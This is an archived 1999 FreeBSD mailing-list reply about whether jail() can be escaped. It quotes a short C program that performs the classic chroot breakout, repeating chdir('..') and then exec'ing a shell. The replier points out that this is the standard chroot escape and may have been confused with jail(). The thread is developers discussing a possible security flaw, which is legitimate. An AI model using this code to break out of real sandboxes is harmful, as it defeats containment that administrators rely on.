Date: Sat, 25 Sep 1999 15:38:29 +0200 From: Harold Gutch <logix@foobar.franken.de> To: Alexander Bezroutchko <abb@zenon.net>, freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: about jail Message-ID: <19990925153829.B14097@foobar.franken.de> In-Reply-To: <19990925171712.A80535@zenon.net>; from Alexander Bezroutchko on Sat, Sep 25, 1999 at 05:17:12PM %2B0400 References: <199909251302.RAA58030@grendel.sovlink.ru> <19990925171712.A80535@zenon.net>
next in thread | previous in thread | raw e-mail | index | archive | help
On Sat, Sep 25, 1999 at 05:17:12PM +0400, Alexander Bezroutchko wrote:
> * it is possible to escape from jail
> Following program escapes from jail (tested under 4.0-19990918-CURRENT):
>
> /* --- start of example ------------------------- */
> #include <unistd.h>
> #include <assert.h>
>
> const char *shell = "/bin/sh";
> const char *lowerdir = "/tmp";
>
> int main() {
> int i;
>
> assert(chdir("/") != -1);
> assert(chroot(lowerdir) != -1);
> for (i = 0; i < 32; i++)
> assert(chdir("..") != -1);
> assert(chroot(".") != -1);
>
> assert(execl(shell, shell, NULL) != -1);
> };
> /* --- end of example --------------------------- */
>
I don't run -CURRENT, so I can't test this - but this is the
standard chroot()-breakout, and you're saying that using it you
can break out of a _jail_ aswell ? Or are you simply mixing up
jail() and chroot() ?
bye,
Harold
--
<Shabby> Sleep is an abstinence syndrome wich occurs due to lack of caffein.
Wed Mar 4 04:53:33 CET 1998 #unix, ircnet
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19990925153829.B14097>